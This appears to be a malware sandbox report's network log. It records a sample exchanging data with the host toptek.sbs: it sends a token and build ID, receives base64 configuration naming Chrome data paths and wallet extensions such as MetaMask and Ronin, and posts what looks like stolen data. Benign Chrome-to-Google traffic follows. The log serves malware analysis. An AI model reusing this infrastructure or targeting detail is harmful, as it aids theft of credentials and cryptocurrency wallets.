                                                                                                                                                                                                                                                                                    Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    4192.168.2.54970894.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:26 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----26FU3EKF37QIE37Y5FUS
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:26 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 32 36 46 55 33 45 4b 46 33 37 51 49 45 33 37 59 35 46 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 32 36 46 55 33 45 4b 46 33 37 51 49 45 33 37 59 35 46 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 32 36 46 55 33 45 4b 46 33 37 51 49 45 33 37 59 35 46 55 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------26FU3EKF37QIE37Y5FUSContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------26FU3EKF37QIE37Y5FUSContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------26FU3EKF37QIE37Y5FUSCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:27 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:27 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                                    Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    5192.168.2.54970994.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:29 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----P8Q1VAS26F37YM79ZMGL
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 332
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:29 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 50 38 51 31 56 41 53 32 36 46 33 37 59 4d 37 39 5a 4d 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 50 38 51 31 56 41 53 32 36 46 33 37 59 4d 37 39 5a 4d 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 50 38 51 31 56 41 53 32 36 46 33 37 59 4d 37 39 5a 4d 47 4c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------P8Q1VAS26F37YM79ZMGLContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------P8Q1VAS26F37YM79ZMGLContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------P8Q1VAS26F37YM79ZMGLCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:29 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:30 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    6192.168.2.54971094.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:31 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HDBAI5PZC2VAAAAIM790
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 6465
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:31 UTC6465OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 41 49 35 50 5a 43 32 56 41 41 41 41 49 4d 37 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 41 49 35 50 5a 43 32 56 41 41 41 41 49 4d 37 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 41 49 35 50 5a 43 32 56 41 41 41 41 49 4d 37 39 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------HDBAI5PZC2VAAAAIM790Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------HDBAI5PZC2VAAAAIM790Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------HDBAI5PZC2VAAAAIM790Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:32 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:32 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    7192.168.2.54971194.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:32 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HDBAI5PZC2VAAAAIM790
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 489
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:32 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 41 49 35 50 5a 43 32 56 41 41 41 41 49 4d 37 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 41 49 35 50 5a 43 32 56 41 41 41 41 49 4d 37 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 41 49 35 50 5a 43 32 56 41 41 41 41 49 4d 37 39 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------HDBAI5PZC2VAAAAIM790Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------HDBAI5PZC2VAAAAIM790Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------HDBAI5PZC2VAAAAIM790Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:33 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:33 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    8192.168.2.549716142.250.181.1324436156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:35 UTC623OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCJDKzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:36 GMT
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-2P0hIpnSwZMhabdCAJkpLA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC124INData Raw: 33 33 32 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6e 61 73 63 61 72 20 74 72 61 63 6b 20 63 6c 6f 73 69 6e 67 22 2c 22 77 69 6e 74 65 72 20 70 61 72 6b 20 73 6b 69 20 72 65 73 6f 72 74 20 67 6f 6e 64 6f 6c 61 22 2c 22 6e 61 73 61 20 61 73 74 72 6f 6e 61 75 74 73 20 73 74 75 63 6b 22 2c 22 6e 65 77 20 6d 6f 76 69 65 73 20 73 74 72 65 61 6d 69 6e 67 22 2c 22 68 69 6c 74 6f
                                                                                                                                                                                                                                                                                    Data Ascii: 332)]}'["",["nascar track closing","winter park ski resort gondola","nasa astronauts stuck","new movies streaming","hilto
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC701INData Raw: 6e 20 68 6f 6e 6f 72 73 20 64 65 76 61 6c 75 61 74 69 6f 6e 22 2c 22 68 6f 6e 65 79 20 62 72 6f 77 73 65 72 20 65 78 74 65 6e 73 69 6f 6e 22 2c 22 6c 6f 75 69 73 69 61 6e 61 20 6d 65 74 65 6f 72 20 73 68 6f 77 65 72 22 2c 22 62 69 6c 6c 73 20 70 61 74 72 69 6f 74 73 20 69 6e 6a 75 72 79 20 72 65 70 6f 72 74 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73
                                                                                                                                                                                                                                                                                    Data Ascii: n honors devaluation","honey browser extension","louisiana meteor shower","bills patriots injury report"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:s
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    9192.168.2.549713142.250.181.1324436156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:35 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    10192.168.2.549714142.250.181.1324436156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:35 UTC526OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCJDKzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Version: 705503573
                                                                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:36 GMT
                                                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC372INData Raw: 31 34 38 32 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                                    Data Ascii: 1482)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:36 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
